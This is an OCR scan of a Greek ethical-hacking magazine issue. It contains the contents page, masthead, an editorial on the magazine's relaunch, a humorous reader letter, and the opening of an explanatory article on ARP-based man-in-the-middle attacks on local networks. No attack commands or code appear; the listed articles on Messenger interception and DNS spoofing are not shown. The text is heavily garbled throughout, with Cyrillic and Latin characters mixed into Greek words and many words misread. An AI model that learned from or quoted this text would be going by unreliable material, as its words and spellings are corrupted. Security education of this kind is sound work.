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(*) επειδἠ το hacking δεν εἶναι υπόθεση μόνο λίγων.;) 


—aMEOISZYON£VOO TT 


εντιτορια 
βίοι αγίων ñ περιοδικό για χάκινγκρ 
OVEIA HEI 


άλλο χακεριές κι άλλο πιπεριές 


Hav IV OE HIVTÀ ατακς 


τι εἴδους επιθέσεις εἶναι αυτές; ποιος 
εἶναι αυτός που μπαίνει στη μέση και TI 
δουλειά ἔχει εκεῖ; 


HIVI ὀιαγωνισµμος CTF, για γνώση και κυρίως διασκέδαση 


παρακολουθήστε ἕναν αγώνα Capture 
the Flag, µε στόχο ro root access o' ἕνα 
Ubuntu box! 


Olly Hali Ta φαγαμε: 


ποιος εἶναι ο καλύτερος φίλος κάθε reverser; 
τι µπορεί να κάνει; πώς µπορεί να το κάνει; 


οὐμπερ φαιρ-γουο O£ µπι-ες-ντι YOUEI 


το pf εἶναι ένα άριστο και ικανότατο firewall 
για το οικιακό ή εταιρικό σας δίκτυο 
- αλήθεια σας λέμε! 


ριβερσινγκ νειτιβ YOUI-VTOOUC EI-TII-AI φανκτιονς 


ένας φιλόδοξος reverser στοχεύει ένα από 
τα πιο δύσκολα λειτουργικά συστήµατα 
κι αρχίζει το κυνήγι συναρτήσεων που 
χρησιμοποιούνται από τις εσωτερικές 
διεργασίες του συστήματος! 


πέρα από τους κλασικούς τρόπους εύρεσης 
κωδικών για ασύρματα δίκτυα υπάρχει και 
κάποιος άλλος, αρκετά πονηρός κι ενίοτε 
εξαιρετικά αποτελεσματικός 


επιθέσεις ΜΙΤΜ στην πράξη: υποκλοπή 
της συνομιλίας µέσω Messenger και 
αλλοίωση του DNS! 


χωρις KEPHATOOEKTH, µερος ενα апо доо 


φτιάξτε το δικό σας arcade cabinet για αληθινά 
αυθεντικό gaming µέχρι τελικής πτώσεως! 


Εκδότης / Διευθυντής Χρήστος Βαρελάς 

Αρχισυντάκτης Παναγιώτης Βαρελάς 

Σύμβουλοι ἐκδοσης Νίκος Μουρατίδης, Βούλα Παυλίδου 

Σύνταξη Παναγιώτης Βαρελάς, Χρήστος Βαρελάς, Ανδρέας 


Βενιέρης, Πώργος Πάννου, Μανώλης Κιαγιάς, Γιώργος 
Μελέκος, Νίκος Μουρατίδης, Χρίστος Τόμπρας 
Γραμματική επιμέλεια Βούλα Παυλίδου 


Καλλιτεχνική Επιμέλεια Πέτρος Φιλιππίδης 


To περιοδικὀ deltaHacker εἶναι συνδρομητικὀ και εκδίδεται апо την Parabing Creations 
δώδεκα φορὲς το χρόνο, στις αρχές κάθε μήνα. H Parabing Creations έχει την ёбра της 
στη Μαιώτιδος 3, 55 133, Καλαμαριά. Η εκτύπωση και η βιβλιοδεσία γίνονται απὀ την 
ThessPrint Α.Ε. To email επικοινωνίας του περιοδικού εἶναι To talk2us@deltahacker.gr 
και TO email για τις συνδρομές το subscriptions@deltahacker.gr. Οι πληροφορἰες για τις 
συνδρομὲς βρίσκονται online, στο http://deltahacker.gr/subscriptions. Όλες οι απόψεις 


που εκφράζονται στα άρθρα δεν εκφράζουν апараітпта και τη γνώµη του περιοδικού. 


(*) τηλέφωνα άµεσης επέμβασης πυροσβεστικής: 112 / 199 
(νοµίζουµε, ψάξτε το και μόνοι σας) 


H διαφήμισή σας θα 
μπορούσε να EIVAT εδώ. 


Θα μπορούσε να 'vai και σε κάποια άλλη σελίδα, δηλαδή. 


Αλλά δεν Elval. 


Προς το παρόν. 


Πάντως µην αναρωτιέστε: Ξέρουμε ότι ξέρετε πως 
€ é ρου με ότι ξερετε τι πρέπει να κάνετε. 


Μην ντρέπεστε, λοιπόν. 


talk2us@deltahacker.gr 


Εμείς πάντως θα σας μιλήσουμε. (*) 
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/var/log/messages 


Nopikh υποσηµείωση: Το κείµενο που ακολουθεί εἶναι ενδεχόμενο va 
παραπέμπει σε πρόσωπα και καταστάσεις της πραγματικής ζωής. Ενδε- 
χομένως ὁμως και να µην παραπέμπει. Αν πάντως παραπέμπει -yeyovóg 
που δεν επιβεβαιώνουμε αλλά OUTE KAI αρνούμαστε-, ας τονιστεί От! 
πρὀκειτα! περί εκπληκτικής συμπτώσεως. H µπορεί και να µην εἶναι. Εν 
κατακλείδι, για Ö,Tı кї αν συμβαίνει δεν έχουμε ιδέα. Δεν ἡμασταν εμείς. 
Αφήστε µας. Πηγαίνετε αλλού. 


Αγαπητὲς φίλες KI αγαπητοἰ φίλοι καλωσορίσατε στο deltaHacker, то 
μοναδικὸ στο εἶδος του μηνιαίο συνδρομητικὀ περιοδικὀ που ασχολείται 
σοβαρά µε To ethical hacking και την ασφάλεια -- αποφεύγοντας όμως 
συστηµατικἀ να εἶναι βαρετό! 


Βαθιά ανάσα. 


Н αλήθεια εἶναι ὁτι κάθε фора nou ο γράφων θέλει να δώσει μέσα σε 
Hid µόνο πρὀταση το στἰγµα του περιοδικού που кратат στα χέρια σας, 
αποτυγχάνει. Όταν пал! συζητά µε κάποιον και θέλει να του εξηγήσει 
γιατὶ ro deltaHacker δεν ἐχει *каріа* σχέση µε τ’ ἀλλα περιοδικά, του 
Ίρχονται каша 20piä праүрата va πει, τα αμολάει όλα пай! οπὀτε, EE- 
pete. Αποτυγχάνει. 


=ava. 


"Av Eva проїду δεν µπορεί va περιγραφτεί μέσα σε µια σύντομη npóra- 
ση, τότε кат! δεν πάει кала µε то ἰδιο το προϊὀν”, ἐρχεται ο µαρκετίστας 
να σημειώσει, µε την απέραντη σοφία του και TIG τρισμέγιστες επικοι- 
νωνιακὲς του ικανότητες. 


О μαρκετἰστας AUTOG δεν εἶναι φανταστικὸς. Αντίθετα, εἶναι πἐρα για 
πέρα αληθινός. Πολλοί εἶναι μάλιστα εκείνοι που τρέχουν να ζητήσουν 
τη συμβουλή του, προκειμένου να προωθήσουν καλύτερα το προϊόν 
τους. 


Και πολύ καλά κάνουν οι ἀνθρωποι και τρέχουν να ζητήσουν τη OUL- | 
βουλὴ του, λέμε εμείς. Αλλά ξέρετε γιατὶ κάνουν πολύ кала; Пат! πολὺ 
апла το δημιοὐργημὰ τους --με ἡ χωρίς EIOAYWYIKÄ--, το βλέπουν ως 
алло EVA προϊόν και τίποτε περισσὀτερο. Σπάνια το πονάνε, KATA το 
κοινώς λεγόμενο, EVO ο χρόνος που επενδύουν ñ η δουλειὰ που κάνουν 
μόνο κατάθεση ψυχἠς δεν αποτελεί. Κάθε алло. Ένα προϊόν θέλουν va 
ρίξουν στην αγορά οι ἄνθρωποι κι αν πιάσει, €, ἐπιασε. Στην καλύτερη 
των περιπτώσεων, λοιπὸν, πάνε και σε µαρκετίστες ἠ/και συμβούλους 
επικοινωνίας, ὥστε να καταλήξουν о’ Eva “μήνυμα” που θα συνοδεύει 
το προϊόν ката ro "launch", που θα ενισχύσει ro "buzz" γύρω του, που 
θα το βοηθήσει να πετύχει "maximum penetration" στην αγορά και πολ- 
ла алла, τα οποία апо ёха σηµείο και μετὰ παραπέμπουν εντελώς, ра 
εντελώς αλλού. 


nan үс 3 ттт AN 


Ξέρετε TI λἐνε για όλα τα προηγούμενα ο γράφων και η παρέα του; 
Κολοκύθια. 


Εντάξει, δεν λένε ακριβώς "κολοκύθια”, ωστόσο δεν χρειάζεται να γράψουμε κακιὲς λεξού- | 
λες για να σας δώσουμε να καταλάβετε ;) 


Пат! όμως λένε "κολοκύθια” -- ἡ ὁ,τι GAAO λένε, τέλος πάντων; [ 


Μα, yiari ανέκαθεν εἶχαν την τύχη va κἀνουν µια δουλειὰ που ταυτίζεται µε πολλά апо τα 
χόμπι τους, р’ ἄλλα λόγια µε πράγματα που αγαπάνε αληθινά. Και ναι, αναφερόμαστε στην 
τεχνολογἱα, στους υπολογιστές, OTA δίκτυα, στον προγραμματισμὸ και φυσικά στο hacking. | 
Όταν κάνεις AUTO nou аүапас και δεν έχεις πρόβλημα va παραδέχεσαι και να μαθαίνεις and 
τα ὀποια λάθη σου, τότε το αποτέλεσµα θα εἶναι кало, ενώ OAO και κἄποιοι θα υπάρχουν nou | 
θα το βρίσκουν χρήσιμο ἡ αξιόλογο. Ως ἐξτρα ὀφελος, όταν κάνεις AUTO που πραγματικά | 
αγαπάς δεν έχεις ανάγκη τη generic, περισπούδαστη γνώµη του κάθε раркетіота ἠ/και στε- | 
γνού εμπόρου, ο οποίος δεν έχει κανένα πρόβλημα τη µία μέρα να πουλάει τσελεμεντέδες, | 
την ἄλλη ταξιδιωτικοὺς οδηγούς για την Παπούα Νέα Γουινέα και την παράλλη σειρά βιβλίων | 
για το PowerPoint 2000-каті. 


Ano την αρχἡ του περασμένου καλοκαιριού, ὅταν η κυκλοφορία του προγὀνου TOU | 
deltaHacker διεκόπη απότομα επειδἠ τα νούμερα δεν ἐβγαιναν, οι άνθρωποι πίσω ano то | 
deltaHacker βρεθήκαµε npo ενὸς διλήμματος. О ἑνας δρόμος που μπορούσαμε να πάρουμε E 
ήταν εκείνος του συμβιβασμού. Па την ακρἰβεια, Oa δεχόµασταν τη σκληρὴ πραγµατικότη- | 
τα kai θα κάναμε бут! εἶχαμε να κάνουμε ἡ ὁπι GAAO µας προσφερόταν, τέλος πάντων. (O | 
γράφων, π.χ., ἄκουσε κάτι για σειρά βιβλίων µε βίους Αγίων.) О ἄλλος δρόμος ἦταν εκείνος! 
της ανεξαρτητοποίησης, ónou пара τις αντιξοότητες θα συνεχίζαμε --μόνοι µας, πλέον-- ν΄’ 
ασχολούμαστε р’ AUTO που ξέρουμε κι αγαπάμε -- και μάλιστα ακόµα καλύτερα, αφού κανείς | 
δεν θα µας υπαγὀρευε τι και πὼς να το κάνουμε. 


Πρέπει να µας nrjpe αρκετά εκατομμύρια ρἰεο-δευτερὀλεπτα, KATA τη διάρκεια των οποίων 
ακούγαμε µέσα στο κεφἀλι µας το music theme апо την ταινία “Μονομάχος”, αλλά τελικά [a 
καταλήξαμε κι επιλέξαμε TO δεύτερο δρόμο. Το kaAokaipi που πέρασε μάς φάνηκε ατέλειωτο, | E 


αλλά KI EVA ano та nio δημιουργικἁ KAI διασκεδαστικἀ που έχουμε NOTE περάσει. | 


Και va ‘paote Aoinóv ξανά μαζί, στο δρόμο nou µας γεμίζει, µας διασκεδάζει, µας κάνει Ka- | 
λύτερους και τελικἁ µας καθορίζει. Í 
Έχουμε πολλά συναρπαστικά KI ενδιαφέροντα πράγματα να μαθαίνουμε και фиска va Ta 
μοιραζόμαστε рас σας. Δεν Oa το κάνουμε µόνο κάθε μήνα, οὐτε μόνο μέσα апо τις σελίδες 
αυτού του περιοδικού. 


To deltaHacker προσγειώθηκε στην καθημερινὀτητἁ µας και σκοπεύει va τη νοηματοδοτεὶ dd 
περισσότερους апо ἑναν τρόπους και µε περισσότερα апо Eva μέσα. | 


Καλώς ἠλθαμε ὁλοι µας στο συναρπαστικὀ κόσμο του ethical hacking -- και καλὴ µας ~ 
окёбаоп! 


subZraw | 


Επί TOU πιεστηρίου 
| 


Μόλις εἶχα τελειώσει TO KEiEVO µου και χτύπησε το κουδούνι της κάτω πόρτας. Ἠταν ο Ta- 
χυδρόμος, που κρατούσε шау επιστολή. Συστημένη, ἐπρεπε va υπογράψω. Τη διάβασα με! 
ενδιαφέρον. Υπογράφει κάποιος Θείος Ακάκιος. Πρέπει va πω От! то буора αυτό μού εἶναι 
παντελώς άγνωστο, αλλά το ύφος της επιστολής KI AUTA που έγραφε кат! µου θύμισαν. Ίσως 
θυμίσουν και σε σας κάτι, av NOTE διαβάζατε εκείνο то «алло» περιοδικὀ. Την αναδηµοσιεύω, 
λοιπόν, στη σελίδα 8. | 
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Αγαπητοί pou, 


Γράφω and το ειδυλλιακό Πόρτο Γερμενό΄ὀπού έχω ξεμείνεν алб τα µέσα του 
καλοκαιριού, πριν τις απεργίες тшу ταξιών. 


Είμαι καθισμένος στον ξύλινο πάγκο δίπλα алб την µεγάλη ανώρα στην 
αυλή KAL πατάω πλήκτρα στην παλνά γραφομηχανή της Κυρίας Καίτης, έχοντας 
την θάλασσα κάτω μπροστά. µου. Όλα είναν πολύ ήρεμα καν ειδυλλιακά, µε την 
εξαίρεση των τζιτζυκνῶν που κοντεύουν να πάθουν αποπληξία από το πολύ TGL 
τζυ. 

Ον πάντες στα γύρω σπίτια κουμούνταν για PEONPEPL, καν, κανονυκά, αὐτό θα 
έκανα. KL εγώ. 

Αλλά νποσχέθηκα στον ανιφιό να γράφω PLAV επιστολή και αυτό κάνω τώρα. 

Οφείλω να ομολογήσω OTL γράφω μεν, αλλά ёро, ταραγμένος και ανήσυχος. 

Δεν είναν η Ονκονομική κατάσταση της χώρας που µε ανησυχεί -ἡ μάλλον: δεν 
είναν μόνο αυτό TOV µε ανησυχεί. Με ανησυχούν πολλά πράγματα. 

Ας πούμε, µε ανησυχεί ότι εδώ και EEL ώρες δεν EXEL ηλεκτρυκό. Δεν ξέρω 
αν φταίνε τα αντιµονοπωλναχκά αντανακλαστικά της ΓΕΝΟΠ-ΔΕΗ (хин) ἡ η 
υπερφόρτωση TOV τοπικού υποσταθμού λόγω των πλιματιστυκών. Αδυνατώ να 
σκεφτώ ποιος πανέξυπνος µπορεί va θέλεν να ανάβεν πλιματιστικὀ στο Πόρτο 
Γερμενό όταν αρκεί να PYEL and το σπίτι καν να κάτσεν στην σκιά. 

То θέµα εἶναι OTL κάτι EXEL συμβεί, καν δεν έχουμε ρεύμα. 

Ku ανησυχώ γνατί µε τέτοια ζέστη, αν δεν έρθει (το ρεύμα) γρήγορα, θα 
λενώσουν τελείως όσα καημένα παγάκια έχουν απομείνει στο ᾠυγείο. Αφήστε 
που θα αρχίσουν να επηρεάζονταν ον προμήθενες πον pov άφησε φεύγοντας προ 
ημερών η μητέρα της εξαδέλφης. 

Mov ετοίμασε, βλέπετε, πολυάριθµα μικρά ταπεράκια (από το IKEA) pe 
διάφορες σπεσιαλιτέ της µέσο- καν ἁπω-ανατολικής κουζίνας, και EXEL τυγκάρεν 
η κατάῴνζξη µέχρι πάνω. 

Ἠταν εκεί, γύρω στα τέλη Αυγούστον. Μετά έφυγαν όλον. 

Δεν ξέρω τι πρεμούρα τους έπιασε, KL ένονωσαν ξαφνικά την ανάγκη να την 
κάνουν. 

Εντάξεν, ο ανιώνός είχε να επιστρέφεν στο Λονδίνο (κακό του κεφαλιού του). 
Αλλά OL άλλοις 

Εγώ, πάντως, αποφάσισα να μείνω εδώ λίγο παραπάνω. Έτσι όπως το είχα 
σκεφτεί αρχικά, θα παρέμενα τουλάχιστον µέχρι να ολοκληρωθεί η Έχθεση 
θεσσαλονίκης HAL να φύγουν OL εκπρόσωπον της Ἰρόνκας. 

H λέξη κλειδί στην παραπάνω φράση είναν το «τουλάχιστον». 

Eivai ήδη µέσα Σεπτεμβρίου, και δεν το έχω πάρει απόφαση να ζεπουνήσω. 


θα αναρωτιέστε, βεβαίως, το καταλαβαίνω. «Καλά, γραφείο δεν έχει αυτός 


να πάει; Πώς την είδε ETOL µε τις παρατεταμένες διακοπές; Εδώ ο κόσμος 
καίγεταν χι αυτός απολαμβάνει τα τζιτζίκνα}» 


Μην αναρωτιέστε, θα τα εξηγήσω όλα. 


Н ουσία είναν OTL axó τον Ιούλιο, αµέσως µε то που πήρα την άδειά µου καν 
ἤρθαμε στο Πόρτο Γερμενό, έχω σκεφτεί πολύ. Αναρωτήθηκα για τα πάντα. 

Αναρωτήθηκα, ac πούμε, αν ήθελα πράγματι να επιστρέφω στην Αθήνα 
ανγουστιάτικα YLA το τεύχος Σεπτεµβρίου, παν να κάθομαν ξανά στο LOLO 
γραφείο, δίπλα στους LOLOUG Ὑεντόνους, HAL να προσπαθώ για шоу ακόµα φορά 
να ζεστάνω το ποκαλάΝι µου πληκτρολογώντας OJO πιο γρήγορα μπορώ. (Αλλά 
χωρίς va πληρώνομαι.) 

Είχα, καταλαβαίνετε, τις επιφυλάξεις µου. 

H σταγόνα που µε έκανε να αποφασίσω ήταν η απεργία των ταξί. 


Έμουν καθισμένος εδώ, στον LOLO πάγκο, κοντώντας την θάλασσα και 
τσυμπολογώντας καρπούζι. Δίπλα μον η Μανρούλα καν ο ανιφιός έπαιζαν 
ναυμαχία. 

To ξέρετε το παιχνίδι, έτσι; O κάθε παίκτης τοποθετεί τα πλοία του σε έναν 
πίνακα 8 επί 8, HAL μετά ανταλλάσσει πυρά µε τον αντίπαλό TOV. Βναλλάξ. 

Έννωσα OTL ήρθε η σειρά pov. 

Απλώνω, λονπὀν, το χέρν µου στο άνφον της Μαιρούλας καν την διακόπτω, 
απαντώντας να µου εξηγήσει την λειτουργία τον. Αμέσως µετά αρχίζω να γράφω 
ένα HELA προς τους συναδέλφους στο γραφείο, µε ποινοποίηση στην Χέλγκα, 
πληροφορώντας τους OTL сро, απινητοποιηµένος στο αεροδρόμιο, HAL OTL 


αδυνατώ να φτάσω στο γραφείο γιατί όλον ον δρόμοι εἶναι αποκλεισµένου ano 
τους διαμαρτυρόμενους αυτονινητιστές. 


Ανακρίβενα, βεβαίως, αλλά δεν πενράζεν. 


Ωραίο πράμα η ναυμαχία, αλλά ακόµα πιο ωραίο πράμα το κινητό µε 
ίντερνετ. Βνδικά όταν νονώθεις OTL έχεις πάρει PLAV απόφαση. Σας το συνιστώ. 


H δική µου απόφαση ήταν OTL στο γραφείο δεν θα επέστρεφα. Ούτε τον 
Αύγουστο, οὔτε τον Σεπτέμβριο, οὔτε ποτέ. 


To μεγάλο ναι παν το μεγάλο ὀχν, MOV λέεν καν ο πονητῆς. 


Αλλά αυτό δεν σήμαινε OTL αποφάσισα va αποσυρθώ. 
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OVELA MELA 


Όχν βέβαια. 

Μια µικρή αποτοξίνωση θα έκανα, χωρίς, όμως -πρέπει να то παραδεχτώ- να 
γνωρίζω πώς θα επέστρεφα καν πού. 

Н απάντηση στο ερώτημά pov, ήρθε µετά από µια συζήτηση που είχα µε τον 
αννφιό δυό τρεις μέρες αργότερα, λίγο προτού φύγεν yra Λονδίνο. 

Άρχισε να µου λέει YLA κάτι «φίλους» πον ετοιμάζουν KÄTI καννούργνο, καν 
που θα μπορούσε va µε ενδιαφέρεν. 

«Tv καυνούργιοὐ» να τον ρωτάω εγώ, αλλά αυτός να TO παίζει διστακτικός. 
«Έχω κάπονες άκρες», μου λέει τελικά σε κάποια φάση, ενώ τρώγαμε μούσμουλα 
καθισμένοι εδώ, στον LOLO πάγκο που είµαν καν τώρα. Απέναντί µας ήταν 
n μητέρα της εξαδέλφης που είναν IVÖOVIOTPIA. Βεφύλλιζε ένα υπερβολικά 
χρωματιστό περιοδικό µε θέµα τον Ινδικό πινηματογράφο. Είχε µεγάλες 
φωτογραφίες καν μεγάλα γράμματα, 

«Είναν κάτι παιδιά που σκέφτονται να βγάλουν ένα περιοδικό YLA χακεριές», 
άρχισε να λέει О ανιφιός. 


«Άλλο πάλιν HAL τούτο», αναρωτήθηκε ξεφυλλίζοντας το περιοδικό της η θεία. 
«Гео, πιπεριές» TL άλλο μπορούνε να γράφουνε για τις πιυπεριές»» 

«Tv εννοείς "Xaxepv£G"$» ρώτησα KL εγώ. 

«ΘΒέρεις πολύ καλά TL εννοώ», µου απάντησε. «Μην µου κάνεις тоу αθώο. Ta 
γραπτά παραμένουν.» 

«Ести OTL ξέρω», επέµεινα. «Άλλο πράγµα να ξέρω για πιπεριές, εννοώ 
χακεριές, καν AMO να μπορώ να γράφω.» 

«Γνα αυτά. που ξέρεις θα γράφεις. Na σου δώσω TO HELA του, να τα μιλήσετε.» 

«Πονανούσ» 


«Δεν τον ξέρει κανείς πονος εἶναν. Όλον τον λένε Κύριο Βµδότη. Είναν ο 
ἀνθρωπός σου.» 

«Корьо Εκδότη τον λένε} Κι εμένα µε λένε AXGHLO. Κύριο AXGXLO. OUTE καν 
хоро, Θείο Ax&Xvo.» Έκανα pra παύση. «Δεν θέλω να γράφω HELA. όταν είμαι σε 
διακοπές!». 

«Δεν µε ενδιαφέρεν ούτε πώς σε λένε OUTE αν θέλεις ἡ δεν θέλεις να γράφεις 
HELA! Αρκεί να επικοννωνήσεις. Στείλε τον σήματα καπνού. Γράφ'του γράμμα KOL 
στείλ'το µε το σαλιγκάρν. Kv αν βαριέσαν να γράφεις µε το χέρν, EXEL µέσα µια 
γραφομηχανή. Λίγο λάδωµα θέλει, HAL δουλεύει pla χαρά.» 

Να µην σας τα πολυλογώ, αγαπητοί рох, το σκέφτηκα албо εδώ, το σκέφτηκα 
GMO εκεί, καν αποφάσισα να αχολουθήσω την προτροπή του ανιὠνού. (Πού 
φτάσαμε!) 

Еш шо σίγουρος OTL δεν το φανταζόταν πως θα χρησιμοποιήσω πράγματι την 
γραφομηχανή της Κυρίας Καίτης που ήταν στο πατάρι, αλλά va'par που την 
χρησυµοποιώ. 

Elva. λίγο θορυβώδης, βέβανα, αλλά µε τέτοια τζιτζύκια εδώ γύρω κανείς δεν 
της δίνει σημασία. 

Хора που δεν σταματάει όταν κόβεταν το ρεύμα. 

Αυτό το τελευταίο είναι πολύ σηµαντικό πλεονέκτημα έτσι όπως έχουν έρθεν 
τα πράγματα στην γαλανή µας πατρίδα. 


Αλλά πού θα πάει; Πάλι µε χρόνια µε καιρούς, πάλιν δικά µας θα'ναι. 


Σας ασπάζομαι, 


θείος Ακάκιος 


V HAOK 


Τι ακριβώς είναι οι επιθέσεις Man in The 
Middle; Ποιος εἶναι ο πλέον δημοφιλής 
τρόπος υλοποίησής τους; Πόσο επικίνδυνες 
είναι στην πράξη; [σελ. 12 ἃ 74] 


Τι είναι επιτέλους αυτοί οι διαγωνισμοί =D]. 
CTF, που γίνονται στα συνέδρια hacking; 
[σελ. 20] 


Γιατί ο Olly debugger εἶναι το πιο 
αγαπημένο εργαλείων όσων ασχολούνται µε το 
code reversing; Γιατί θα ήθελε κάποιος v' 
αναζητά κρυμμένες συναρτήσεις µέσα στις 
βιβλιοθήκες των Windows; [σελ. 34 & 56] 


д Aight f мид 


Τι θα λέγατε για Eva κανονικότατο Arcade 
cabinet στο σαλόνι σας; [σελ. 84] 
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Па vav pentester, security analyst ñ network administrator, 
о ὄρος "MiTM" αποτελεἰ ψωμοτύρι. Κι όμως, αν κἄποιος δεν 
εἶναι προσεκτικὀς μπορεί να την πάθει εὐκολα, ακόµα KI αν 
τον ἐχει βάλει στο нат! ἑνας άπειρος аїїасКег που άρχισε να 
πειραματίζεται μόλις την προηγούµενη βδομάδα. Υπάρχουν 
αρκετοί τρόποι yia να εξαπολυθεἰ µια επίθεση Man-in-The- 
Middle. Στο napóv ἆθρο θα εξηγήσουμε noc ακριβὼς δουλεύει 
ἑνας ano τους βασικὀτερους: εκείνος που βασίζεται 
στο πρωτόκολλο ARP. Θα εξηγήσουμε, αναλυτικά 
και προσπαθώντας να µη γίνουμε (πολὺ) βαρε- 
TOI, την όλη λογική της επίθεσης, ενώ στο àp- 
θρο που αρχίζει ano τη σελίδα 74 θα δούμε 
και μερικὰ πολύ συγκεκριµένα παραδείγμα- 
τα. 


Συνεχἰστε το διάβασμα, δεν θα το µετα- 
νιώσετε ;) 


Μοντέλο τυφλἠς εμπιστοσύνης... 


Σε κάθε σύγχρονο εργασιακὀ χώρο unap- 
χει EVA TONIKO δίκτυο (Local Area Network, 
LAN), βασισμένο στην τεχνολογία διασύν- 
δεσης του Ethernet. Το ἰδιο ισχύει και σε 
Πολλά σχολικἀ/πανεπιστημιακά/ερευνητι- 
ка εργαστήρια ἡ ακόµα και στα σπίτια µας, 
ὁπου πλέον η παρουσία περισσότερων TOU 
ενὸς υπολογιστών δεν αποτελεἰ кайт! TO 
ασυνήθιστο. H τεχνολογία rou Ethernet 
αποδεικνύεται εξαιρετικἀ βολικἠ κι ano- 
δοτικἠ στην πράξη, παρουσιάζει όμως µια 
σηµαντικἠ, ὁπως θα Seite σε λίγο, αδυνα- 
Ша: Δεν επιβάλλει κανενὸς εἰἶδους unxavi- 
сро ταυτοποίησης (authentication) για τα 
μηχανήματα που συμμετέχουν σ’ Eva LAN. 
Βλέπετε, το ζήτημα της ταυτοποίησης ενὸς 
υπολογιστή ἦταν ανύπαρκτο nepi τα μέσα της 
δεκαετίας Tou ‘70, ὁταν στα εργαστήρια PARC 
της Xerox οι Robert Metcalfe και David Boggs 
επινοούσαν To Ethernet. Σήµερα, орос, χάρη 
στην πανταχού παρουσία των τοπικὠν ÖIKTU- 
ων, η συγκεκριμένη αδυναμία Tou Ethernet 
σημαίνει ότι οποιοδήποτε μηχάνημα evöc LAN 
εἶναι σε θἐση va αναδρομολογεἰ την κυκλοφο- 
pia που απευθύνεται с’ Eva ἆλλο μηχάνημα, 
ὡστε τελικά va nepva απ’ το ἰδιο! Οι τροµακτι- 
KÊÇ επιπτώσεις του γεγονότος αυτού θα γίνουν 
καλύτερα αντιληπτές σε Ліүо. 


Σε αντίθεση µε ra тотка δίκτυα, To Internet 
χαρακτηρίζεται ως Eva δίκτυο ευρείας περιοχἠς 
(Wide Area Network ἡ απλά WAN), αφού anap- 
τἰζεται ané αναρίθμητα υποδίκτυα κι εκτείνεται 
с’ ολόκληρο τον πλανήτη. H δρομολόγηση των 
πακέτων µέσα στο Internet επιτυγχάνεται χάρη 
στο πασίγνωστο πρωτόκολλο IP, το οποίο εἶναι ETO! 
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P 


σχεδιασμένο WOTE να καθοδηγεἰ αποτελεσματικἁ πληροφορίες μέσα σε 
οσοδήποτε μεγάλα και πολύπλοκα, ιεραρχικἁ δίκτυα. Σε σύγκριση µε TO 
Internet, ¿va (οσοδήποτε µεγάλο) LAN εἶναι “επίπεδο” κι απείρως nio 
апло. Κάθε υπολογιστἠς nou αποτελεἰ μέλος ενός LAN έχει (τουλάχιστον) 
µια карта δικτύου, η οποία εἶναι ενσύρματη ἡ ασύρματη και χρησιμοποιεί 
την τεχνολογία Tou Ethernet’. Μια τέτοια карта φέρει ¿vav μοναδικὀ 
αριθμὀ υλικού, ο οποίος την ταυτοποιεἰ μονοσήμαντα. Οι κάρτες αυτὲς 
αναφέρονται κι ως NICs (Network Interface Controllers) και oi διευθύν- 
σεις υλικού ως MAC (Media Access Control) addresses. Χάρη στη uova- 
δικότητα των MAC addresses, ἑνας οποιοσδήποτε υπολογιστής ενὸς LAN 
εἶναι σε θέση ν΄’ αποστέλλει *angubgiac* πακέτα σ΄’ Evav οποιονδήποτε 
алло υπολογιστή Tou ἰδιου LAN. Επιπρὀσθετα, ἑνας υπολογιστής EXE! τη 
δυνατότητα να εκπέμπει (broadcasting) πακέτα, τα οποία λαμβάνουν 

όλοι οι ἄλλοι υπολογιστὲς του LAN?. 


Ὅμως κάθε LAN TENIKÄ βγαίνει στο Internet, οπότε εἶναι χρήσιμο va 
καταλαβαίνει KAI το IVTEPVETIKÖ πρωτόκολλο IP. AUTO ακριβώς oup- 
βαἰνει στην πράξη. Σ΄ eva LAN έχουμε δύο μεθόδους δρομολόγησης 
πακέτων: H jia χαρακτηρίζεται ως τοπικἠ (local) και χρησιμοποιεί 
τις διευθύνσεις MAC. Н ἄλλη χαρακτηρἰζεται ως καθολικἠ (global) 
κι εκμεταλλεύεται το πρωτόκολλο IP, συνεπώς KAI το αντίστοιχο 
σύστημα διευθυνσιοδότησης (IP addressing). Μετά апо τα napa- 
πάνω εἶναι προφανὲς OT! σε κάθε LAN απαιτεἰται η παρουσία ενὸς 
μηχανισμού που θα γεφυρώνει, нє κἄποιο τρόπο, MAC addresses 
KI IP addresses. O μηχανισμὸς αυτός υπάρχει και περιγράφεται 
ano ro Address Resolution Protocol - εν συντομία ARP. Πρὸ- 
κειται για EVA απλὸ κι αποτελεσματικὀ πρωτόκολλο το οποίο, 
όπως ἰσως ἐχετε αρχίσει να υποψιάζεστε, ἐχει µια σηµαντικἡ 
αδυναμία. Πριν σας την αποκαλύψουμε, Seite To ARP σε öpä- 
ση. 


Ὅταν στον router ενὸς LAN φτάνει Eva εισερχὀόµενο πακέτο 
IP που προορίζεται yia Eva ano τα μηχανήματα του εσω- 
τερικού, τοπικού δικτύου, προκειµένου να ταξιδέψει μέσα 
στο LAN πρέπει прота να ενθυλακωθεἰ μέσα с’ Eva пакё- 
το Ethernet. Auto το τελευταίο θα περιλαμβάνει, µετα- 
Бо ἄλλων, µια διεύθυνση MAC. Προφανώς, quTñ η MAC 
address giv’ εκείνη Tou NIC που φέρει ο παραλήπτης”. 
Σε περίπτωση ropa nou o router ἠδη γνωρίζει το εν 
λόγω MAC address, βάζει το πακέτο IP μέσα о’ Eva 
πακέτο Ethernet και To αφήνει να διασχίσει το LAN, 
γνωρίζοντας бт! θα φτάσει στο σωστὀ μηχάνημα. Ei- 
ναι όμως ni8avó o router να µη γνωρίζει το MAC 
address του παραλήπτη. Ίσως пал! va το γνώριζε 
κάποια στιγμὴ αλλά тора η περίοδος εγκυρότητας 
της συγκεκριμένης πληροφορίας ἐχει λήξει (εἶναι 
δηλαδή expired, yia να μιλήσουμε την αγγλοελ- 
Anvikn). Σε τέτοιες περιπτώσεις ο router µε TO 
δίκιο του αισθάνεται µια κάποια ανασφάλεια. Fi 


1, Για την ακρίβεια, οι κάρτες ασύρματης δικτύωσης WiFi χρησιμοποιούν το Ethernet στο Data Link Layer του 
TCP/IP model. Λεπτομέρεια για το θέμα µας, ωστόσο TO αναφέρουμε προς αποφυγἠ παρεξηγήσεων :) 

2. To broadcasting εἶναι ο μόνος τρόπος διακίνησης πακέτων µέσα o’ Eva LAN ὀπου οι υπολογιστές επικοινωνούν 
μέσω hub. Ωστόσο στη συντριπτική πλειονότητα των σύγχρονων LAN χρησιμοποιούνται switches, γεγονός που 
σημαίνει ὁτι σε τέτοια δίκτυα εἶναι δυνατἠ η «απευθείας: αποστολή πακέτων σε “συγκεκριμένα” μηχανήματα. 
3. Ακριβέστερα, πρόκειται για To NIC του μηχανήματος που ἐχει IP ἰδιο µε To destination IP address Tou 
εισερχὀµενου πακέτου. 


Σχήµα 1 

